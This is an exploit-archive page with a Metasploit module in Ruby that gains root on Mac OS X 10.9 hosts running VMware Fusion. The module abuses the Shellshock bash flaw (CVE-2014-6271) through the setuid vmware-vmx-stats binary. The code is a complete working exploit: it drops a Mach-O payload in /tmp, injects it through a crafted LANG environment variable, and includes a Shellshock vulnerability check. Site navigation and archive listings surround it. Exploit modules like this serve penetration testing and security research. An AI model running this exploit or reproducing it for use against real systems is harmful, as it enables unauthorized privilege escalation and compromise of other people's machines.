Mac OS X VMWare Fusion Root Privilege Escalation

Mac OS X VMWare Fusion Root Privilege Escalation: Posted Sep 25, 2014; Authored by mubix, joev, Stephane Chazelas, juken | Site metasploit.com; This abuses the bug in bash environment variables (CVE-2014-6271) to get a suid binary inside of VMWare Fusion to launch our payload as root.; tags | exploit, root, bash; advisories | CVE-2014-6271; SHA-256 | f04f53cef923e1ebad417dccfb1f6d01ee754b3ddac0ef16fcb609fa3f055392; Download | Favorite | View

Mac OS X VMWare Fusion Root Privilege Escalation

##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Local
  Rank = NormalRanking

  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info={})
    super(update_info(info,
      'Name'          => 'Mac OS X VMWare Fusion Root Privilege Escalation Exploit',
      'Description'   => %q{
        This abuses the bug in bash environment variables (CVE-2014-6271) to get
        a suid binary inside of VMWare Fusion to launch our payload as root.
      },
      'License'       => MSF_LICENSE,
      'Author'        =>
        [
          'Stephane Chazelas', # discovered the bash bug
          'juken', # discovered the VMWare priv esc
          'joev', # msf module
          'mubix' # vmware-vmx-stats
        ],
      'References'    =>
        [
          [ 'CVE', '2014-6271' ]
        ],
      'Platform'      => 'osx',
      'Arch'          => [ ARCH_X86_64 ],
      'SessionTypes'  => [ 'shell', 'meterpreter' ],
      'Targets'       => [
        [ 'Mac OS X 10.9 Mavericks x64 (Native Payload)',
          {
            'Platform' => 'osx',
            'Arch' => ARCH_X86_64
          }
        ]
      ],
      'DefaultTarget' => 0,
      'DisclosureDate' => 'Sep 24 2014'
    ))

    register_options([
      OptString.new('VMWARE_PATH', [true, "The path to VMware.app", '/Applications/VMware Fusion.app']),
    ], self.class)
  end

  def check
    check_str = Rex::Text.rand_text_alphanumeric(5)
    # ensure they are vulnerable to bash env variable bug
    if cmd_exec("env x='() { :;}; echo #{check_str}' bash -c echo").include?(check_str) &&
       cmd_exec("file '#{datastore['VMWARE_PATH']}'") !~ /cannot open/

      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  end

  def exploit
    payload_file = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
    path = '/Contents/Library/vmware-vmx-stats' # path to the suid binary

    print_status("Writing payload file as '#{payload_file}'")
    exe = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
    write_file(payload_file, exe)
    register_file_for_cleanup(payload_file)
    cmd_exec("chmod +x #{payload_file}")

    print_status("Running VMWare services...")
    cmd_exec("LANG='() { :;}; #{payload_file}' '#{datastore['VMWARE_PATH']}#{path}' /dev/random")
  end

end

Top Authors In Last 30 Days

Red Hat 221 files
Ubuntu 59 files
Debian 30 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
tmrswrr 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,298)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,550)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,453)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

Mac OS X VMWare Fusion Root Privilege Escalation

Mac OS X VMWare Fusion Root Privilege Escalation

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Mac OS X VMWare Fusion Root Privilege Escalation

Share This

Mac OS X VMWare Fusion Root Privilege Escalation

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems